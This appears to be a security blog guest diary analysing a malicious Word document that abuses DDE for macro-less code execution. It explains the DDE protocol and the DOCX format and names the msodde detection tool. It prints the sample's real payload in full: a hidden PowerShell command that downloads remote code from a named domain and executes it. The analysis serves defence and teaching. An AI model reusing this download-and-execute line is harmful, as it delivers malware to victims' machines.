Last Updated: 2017-10-26 04:22:53 UTC
by Richard Porter (Version: 1)
Guest Diary: Etay Nir
In the past few days, the industry became aware of a new technique to deliver malware, using macro-less code execution in MS Word, leveraging the Microsoft Dynamic Data Exchange (DDE) protocol. A good research blog entry can be found here:
In this post:
- I’m going to give some background on the DDE Protocol
- Microsoft Open XML format
- Use a sample from a hash found at VirusTotal
Dynamic Data Exchange
Windows provides several methods for transferring data between applications. One method is to use the DDE protocol. The DDE protocol is a set of messages and guidelines. It sends messages between applications that share data, and uses shared memory to exchange data between applications. Applications can use the DDE protocol for one-time data transfers and for continuous exchanges, in which applications send updates to one another, as new data becomes available.
Windows also supports the Dynamic Data Exchange Management Library (DDEML). The DDEML is a dynamic-link library (DLL) that applications can use to share data. The DDEML provides functions and messages that simplify the task of adding DDE capability to an application. Instead of sending, posting, and processing DDE messages directly, an application uses the DDEML functions to manage DDE conversations. (A DDE conversation is the interaction between client and server applications.)
Further information about DDE can be found here:
Microsoft Open XML Format
In order to better understand how the different office malware research tools and utilities work and why they were designed in a certain way, including this particular post about macro-less execution in MS word, a good starting point is to better understand the basic structure and format of the Microsoft office documents.
Following the advent of XML in the 1990s, corporate computing customers began to realize the business value in adopting open formats and standardization in the computer products and applications that they relied on. IT professionals benefited from the common data format possible with XML because of its capacity to be read by applications, platforms, and Internet browsers.
Likewise, with the adoption of support for XML in Microsoft Office 2000, developers began to see the need to transition from the binary file formats seen in previous versions of Microsoft Office to the XML format. Binary files (.doc, .dot, .xls, and .ppt files), which for years did a great job of storing and transporting data, were not able to meet the new workplace challenges that included easily moving data between disparate applications, and allowing users to glean business insight from that data.
The 2007 Microsoft Office system continues with this transition by adopting an XML-based file format for Microsoft Office Excel 2007, Microsoft Office Word 2007, and Microsoft Office PowerPoint 2007. The new file format, called Office Open XML Formats, addresses these workplace issues with changes that affect the way you approach solutions based on Microsoft Office documents.
The Office Open XML is a zipped, XML-based file format developed by Microsoft for representing spreadsheets, charts, presentations and word processing documents. The format was initially standardized by Ecma (as ECMA-376), and by the ISO and IEC (as ISO/IEC 29500) in later versions.
Starting with Microsoft Office 2007, the Office Open XML file formats have become the default target file format of Microsoft Office. Microsoft Office 2010 provides read support for ECMA-376, read/write support for ISO/IEC 29500 Transitional, and read support for ISO/IEC 29500 Strict. Microsoft Office 2013 and Microsoft Office 2016 additionally support both reading and writing of ISO/IEC 29500 Strict.
In this post, we will focus mainly on the DOCX format, and will provide links and sources for further reading at the “Suggested Reading” section.
DOCX is the file format for Microsoft Office 2007 and later, which should not be confused with DOC, the format used by earlier versions of Microsoft Office.
DOCX is written in an XML format, which consists of a ZIP archive file containing XML and binaries. Content can be analyzed without modification by unzipping the file (e.g. in WinZIP) and analyzing the contents of the archive.
The file _rels/.rels contains information about the structure of the document. It contains paths to the metadata information as well as the main XML document that contains the content of the document itself.
Metadata information are usually stored in the folder docProps. Two or more XML files are stored inside that folder; app.xml that stores metadata information extracted from the Word application itself, and core.xml that stores metadata from the document, such as the author name, last time it was printed, etc.
Another folder contains the actual content of the document, in a Word document, or a .docx document. A XML file called document.xml is the main document, containing most of the content of the document itself, also the place we will focus our attention when looking into an office document that uses DDE.
To recap, the word document (docx) consist of a container format (Zipped archive and XML binaries) and Matadata. The metadada consists of four categories:
Document Properties – core
Document Properties – extended
Analyzing A Sample
For this particular example, I’m using a hash found at VirusTotal:
To verify we have a file with the proper format, I’ll use the ‘file’ command:
Next step is to open the sample using BBEdit
We can immediately see the format structure of the docx file and focus our attention at the document.xml and look at its content.
When first looking at the document.xml everything is formatted or collapsed into a single line, here is a ‘beautified’ version:
There are a few interesting findings we can glean from this view:
- From the different lines, we can see references to C:\\Windows\\System32\\, cmd.exe, powershell with switches and a call to a domain. After parsing the different line, we get the following:
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://ryanbaptistchurch.com/KJHDhbje71');powershell -e $e"
- There are a few other interesting little things that come up during the analysis, however I’ll table them aside, since we don’t want to assume the source or who authored this document. But they are pretty visible.
Actually yes, there is a tool. There is one python script that was written as part of the python-oletools package. I would like to thank Philippe Lagadec for authoring the msodde tool that can be found at:
The script is pretty simple to use and pretty self-explanatory:
I would also like to thank Didier Stevens for the amazing set of tools he had written, as well as deep knowledge and insight.
Sources and Suggested Reading